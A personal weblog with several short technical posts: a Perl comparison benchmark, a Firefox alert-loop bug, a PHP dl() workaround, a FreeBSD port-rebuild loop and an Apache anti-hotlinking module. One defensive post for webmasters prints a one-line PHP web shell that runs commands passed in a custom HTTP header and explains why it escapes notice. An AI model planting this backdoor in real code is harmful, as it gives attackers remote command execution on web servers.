dpk’s weblog

This may be old news for people more familiar with perl internals.

dpk@dpk1:~$ perl -version | head -2

This is perl, v5.8.8 built for i486-linux-gnu-thread-multi
dpk@dpk1:~$ cat test1.pl
#!/usr/bin/perl

use strict;

my $x = 0;
while ($x < 100)
{
  &doit();
  $x++;
}

sub doit() {
  my $foo = 'foobar'; my $x = 0; my $y = 0;
  while ($x < 1000000)
  {
    if ($foo eq 'foofoo')
    {
      $y++;
    }
    $x++;
  }
}
dpk@dpk1:~$ perl -d:DProf test1.pl;dprofpp
Total Elapsed Time = 52.07938 Seconds
  User+System Time = 52.07938 Seconds
Exclusive Times
%Time ExclSec CumulS #Calls sec/call Csec/c  Name
 99.9   52.07 52.070    100   0.5207 0.5207  main::doit
 0.00       - -0.000      1        -      -  strict::bits
 0.00       - -0.000      1        -      -  strict::import
 0.00       - -0.000      1        -      -  main::BEGIN

And then:

dpk@dpk1:~$ cat test2.pl
#!/usr/bin/perl

use strict;

my $x = 0;
while ($x < 100)
{
  &doit();
  $x++;
}

sub doit() {
  my $foo = 'foobar'; my $x = 0; my $y = 0;
  while ($x < 1000000)
  {
    if ('foofoo' eq $foo)
    {
      $y++;
    }
    $x++;
  }
}
Total Elapsed Time = 51.31948 Seconds
  User+System Time = 51.30948 Seconds
Exclusive Times
%Time ExclSec CumulS #Calls sec/call Csec/c  Name
 100.   51.31 51.310    100   0.5131 0.5131  main::doit
 0.00       - -0.000      1        -      -  strict::bits
 0.00       - -0.000      1        -      -  strict::import
 0.00       - -0.000      1        -      -  main::BEGIN

I’ve repeated this little test multiple times, with different several different inputs, but the result is always the same. if ('string' eq $variable) is faster than if ($variable eq 'string')

There are sites out there (in the tired “Rick Roll” category) that make it hard to close a tab, by adding hooks that allow for dozens or hundreds of alert dialog boxes to appear, preventing the tab from closing. One is http://www.internetisseriousbusiness.com. Don’t go to this site, unless you want to see the bug in action.

I posted a bug on bugzilla, after doing a search. I didn’t see any, but as there are hundreds of thousands of other bugs on there, I didn’t want to spend hours hunting down an exact match, so I just went ahead with it. Turns out I should have searched for “rick roll,” rather than something more specific such as “javascript alert exit loop” or similar. Ah, well, such is the folly of search engines.

So, it got merged in to another bug that’s over 7 years old. Surprisingly, it has only gathered 60 votes in that incredible period of time. I’m asking you, the loyal dpk dot net reader, to use one of your 10000 votes on this bug, and to help raise awareness of this issue, so that it might be squashed.

Looking at the code, it seems like it might involve simply adding another button to the alert dialog box, that would just kill the tab’s javascript context. But, I don’t really know how to do all that. It kinda looks like there’s different alert box code for each “platform.” I dunno. I’m no mozilla pro.

The pdf extension library shipped with PHP-4.4.7 doesn’t work, and it’s a known “non-bug”. I’m not sure why they still ship the broken library. I installed the PECL version, via pear (my first time trying that), and that was pretty painless. It created a pdf.so and put it in some long /usr/local/lib path. So I figured, now I can just load it with:

dl("/usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so");

right? Wrong:

Warning: dl(): Unable to load dynamic library './/usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so' - Cannot open ".//usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so" in /root/test.php on line 7

I have “./” as my extension_dir in php.ini. For some reason, the code for dl doesn’t recognize that I’m specifying a full path, though. The fix, according to posters on http://www.php.net/dl, is to prepend a sufficient number of ../’s to the path before calling dl() !

The resulting code (with helpful dpk-comments) is:
<?php
// This is required, and is astounding.
$dotdots = preg_replace ('//([^/]+)/', '../', dirname(__FILE__));
$dlpath = $dotdots . '/usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so';
dl($dlpath);
// My brain still hurts.
$p = PDF_new();
?>


Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the look out for crud like this:

<? passthru(getenv(“HTTP_ACCEPT_jayman”)); ?>

This script can be used by sending whatever command you want in a “Accept-jayman:” HTTP header. “jayman” is just an example (a prevelant one), it could be anything. This can be placed to any of your PHP scripts without affecting your user’s experience, because the header is not something sent by any browser. Headers are also not typically logged anywhere, so the attacker may not be caught by inspecting logs.

I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam advertised content.

If you see something like this in your scripts, or on its own, it was put there by an attacker using another exploitable script on your site. It’s very important to keep your site’s scripts up-to-date, and it’s a good idea to hire someone to audit your code or keep it up to date, if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts, if any of them use Zend Encoder created files.)

It’s also important to make sure your permissions are not overly open. PHP scripts, typically, run as the web server’s user. If your directory permissions are open (777, for example), and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies.

Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgable and trustworthy to check out your site if find you need help.

When is stability going to finally trump features?

In just about anything related to computers, there’s a tug of war between adding new features or fixing bugs. … in the general computing world, people don’t get sued for bugs, and adding new features is much more fun and sexy than fixing bugs.

I’m in total agreement with this guy. Just going for the free trackback here, heh.

If you ever find yourself in my situation, where installing some updated port from a relatively freshly done cvsup ends up breaking a couple dozen other programs because it decided to upgrade several libraries, you might find the following for loop useful:

cd /usr/X11R6/bin && for m in $(for l in $(for j in $(for i in *; do
ldd $i 2>/dev/null | grep -q "not found" && echo $i; done);do
egrep "bin/$j" /var/db/pkg/*/+CONTENTS;done | sort -u | cut -f1 -d:);do
grep " ORIGIN" $l;done | cut -f2 -d: | sort -u);do
cd /usr/ports/$m && make && make deinstall && make reinstall;done

Obviously, the above is evil in itself, so it should be considered a “quick fix” and nothing more. Enjoy!

mod_hotlink is some software I wrote ages ago to deal with the problem of how to politely* prevent one site from linking to images on another, without using tons of CPU (as does mod_rewrite solutions)

From the README:

Protects non-text content against “hotlinking” – a method for stealing
bandwidth by linking images and content from other websites to present
them as if they were their own.

For Apache 1.3, fully tested with 1.3.26, also works with later
versions. Not tested and not expected to work with 2.x without some
effort. Finally got around to creating a project for it, so hopefully
if it is found to be of use, a group effort will make something more
of it.

Please note: The Referer header sent by browsers is completely
optional, and often untrustworthy. There is very little anyone can
do about that. So, this won’t protect you from all hotlinking. In
practice, it works for most browsers.

* Politely as in people can still do it if they disable sending of referrer information, of course.